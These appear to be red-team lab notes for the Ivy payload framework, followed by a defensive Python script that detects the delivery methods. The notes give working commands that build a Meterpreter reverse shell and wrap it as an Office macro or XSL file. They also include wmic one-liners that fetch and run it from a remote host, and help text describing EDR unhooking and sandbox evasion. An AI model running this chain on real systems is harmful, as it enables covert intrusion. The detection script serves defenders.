Ivy
Payload Framework
https://github.com/optiv/Ivy
Generate Payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o msf.bin LHOST=172.16.245.16 LPORT=4444

Convert to Word macro:
./Ivy -stageless -Ix64 msf.bin -delivery macro -product Word -unhook -P Local -O ivymsf.txt

Convert to Excel file (xsl delivery):
./Ivy -Ix64 msf.bin -P Local -O Ivy.xsl -url http://salesforce.vmoshpit-lab.com -delivery xsl -stageless

One-liner command to execute it (any of the three forms below):
wmic computersystem list full /format:"http://salesforce.vmoshpit-lab.com/Ivy.xsl"
wmic computersystem list brief /format:"http://salesforce.vmoshpit-lab.com/Ivy.xsl"
wmic process list brief /format:"http://salesforce.vmoshpit-lab.com/Ivy.xsl"

Usage of ./Ivy:
  -Ix64 string
        Path to the x64 payload
  -Ix86 string
        Path to the x86 payload
  -O string
        Name of output file
  -P string
        Payload type "Inject" (Which performs a process injection) or "Local" (Which loads the payload directly into the current process)
  -debug
        Print debug statements
  -delivery string
        Generates an one-liner command to download and execute the payload remotely:
        [] bits - Generates a Bitsadmin one liner command to download, execute and remove the loader.
        [] hta - Generates a blank hta file containing the loader along with a one liner command execute the loader remotely.
        [] macro - Generates an office macro that would download and execute a the loader remotely.
        [] xsl - Generates a xsl stylesheet file containing the loader along with a one liner command execute the loader remotely.
  -process32 string
        The full path to the x86 application to spawn. Only use applications that are found in System32 & SYSWOW64 (default is rundll32.exe)
  -process64 string
        The full path to the x64 application to spawn. Please specify the path to the process to create/inject into (use \ for the path) (default is explorer.exe)
  -product string
        Name of the office product to use (Excel, Word, PowerPoint) (default "Excel")
  -sandbox
        Enable sandbox evasion controls (i.e. checks if the system is domain joined)
  -stageless
        Enables stageless payload. When this option is enabled use a raw payload (aka .bin files) instead of .c code
  -unhook
        Unhooks EDR's hooks before loading payload
  -url string
        URL assoicated with the Delivery option to retrieve the payload. (e.g https://acme.com/)
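From the defender's side, the delivery options listed above (wmic loading a remote XSL stylesheet, bitsadmin downloads, an Office macro spawning a child process) all leave characteristic process-creation telemetry. The following is an added example, not part of these notes or of the Ivy project, that triages such events; it assumes a collector exporting Sysmon-style Image, ParentImage and CommandLine fields in a flat key=value form, and the sample events are constructed for the demonstration.

```python
"""Triage process-creation events for the delivery mechanisms named on the page:
wmic /format pointing at a remote or file-based stylesheet, bitsadmin downloads,
and Office products spawning a script host. Added example with constructed data."""
import ntpath
import re

# Constructed Sysmon-style events (assumption: flat "Key=Value|Key=Value" export).
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\wbem\\WMIC.exe|ParentImage=C:\\Windows\\System32\\cmd.exe|"
    'CommandLine=wmic computersystem list full /format:"http://salesforce.vmoshpit-lab.com/Ivy.xsl"',
    # Benign: built-in "list" format keyword, no stylesheet path or URL.
    "Image=C:\\Windows\\System32\\wbem\\WMIC.exe|ParentImage=C:\\Windows\\System32\\cmd.exe|"
    "CommandLine=wmic os get caption,version /format:list",
    "Image=C:\\Windows\\System32\\bitsadmin.exe|ParentImage=C:\\Windows\\System32\\cmd.exe|"
    "CommandLine=bitsadmin /transfer upd /download /priority high http://example.invalid/a.dll C:\\Users\\Public\\a.dll",
    # Macro-style delivery: Word launches cmd, which runs the wmic one-liner.
    "Image=C:\\Windows\\System32\\cmd.exe|ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE|"
    'CommandLine=cmd.exe /c start /min wmic process list brief /format:"http://salesforce.vmoshpit-lab.com/Ivy.xsl"',
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                "wmic.exe", "rundll32.exe", "regsvr32.exe", "bitsadmin.exe"}
# Captures the value of a wmic /format: argument, quoted or not.
FORMAT_ARG = re.compile(r'/format\s*:\s*"?([^"\s]+)', re.IGNORECASE)


def parse_event(line):
    """Split a flat key=value event on '|'; the first '=' in each field is the separator."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def is_remote_source(value):
    """True when a /format value is a URL, a UNC path, or an explicit stylesheet file
    rather than one of wmic's built-in format keywords (list, csv, table, ...)."""
    v = value.lower()
    return v.startswith(("http://", "https://", "\\\\")) or v.endswith((".xsl", ".xslt"))


def check_wmic_format(fields):
    # Checked on the command line rather than the image so "cmd /c wmic ..." is caught too.
    m = FORMAT_ARG.search(fields.get("CommandLine", ""))
    return bool(m) and is_remote_source(m.group(1))


def check_bitsadmin(fields):
    image = ntpath.basename(fields.get("Image", "")).lower()
    cmd = fields.get("CommandLine", "").lower()
    return image == "bitsadmin.exe" and ("/transfer" in cmd or "/download" in cmd) and "://" in cmd


def check_office_child(fields):
    parent = ntpath.basename(fields.get("ParentImage", "")).lower()
    image = ntpath.basename(fields.get("Image", "")).lower()
    return parent in OFFICE_PARENTS and image in SCRIPT_HOSTS


RULES = [
    ("wmic_remote_stylesheet", check_wmic_format),
    ("bitsadmin_download", check_bitsadmin),
    ("office_spawned_script_host", check_office_child),
]


def scan_events(events):
    """Return (rule_name, command_line) for every rule hit; one event may hit several rules."""
    findings = []
    for line in events:
        fields = parse_event(line)
        for name, check in RULES:
            if check(fields):
                findings.append((name, fields.get("CommandLine", "")))
    return findings


if __name__ == "__main__":
    for name, cmd in scan_events(SAMPLE_EVENTS):
        print(f"[{name}] {cmd}")
```

The wmic rule keys on the /format value rather than on the domain in the URL, so it still fires when the hosting site changes; the benign "/format:list" event is not flagged. The last sample event hits two rules at once (remote stylesheet plus an Office parent), which is the kind of overlap worth surfacing as a higher-confidence alert.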